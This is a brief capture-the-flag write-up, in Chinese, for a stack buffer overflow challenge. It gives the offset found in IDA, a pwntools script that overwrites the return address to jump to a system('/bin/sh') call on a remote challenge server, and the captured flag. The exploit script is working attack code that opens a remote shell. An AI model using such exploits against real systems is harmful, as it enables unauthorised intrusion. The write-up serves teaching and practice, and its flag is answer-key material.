### stack

用ida一看，找到字符串和ebp差`0x3a`，然后发现在`0x080491E2`有`system("/bin/sh")`。没了。

```python
from pwn import *
pld = 'A' * (0x3a + 4) + p32(0x080491E2)
p = remote("159.65.68.241", 10003)
p.sendline(pld)
p.interactive()
```

> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}`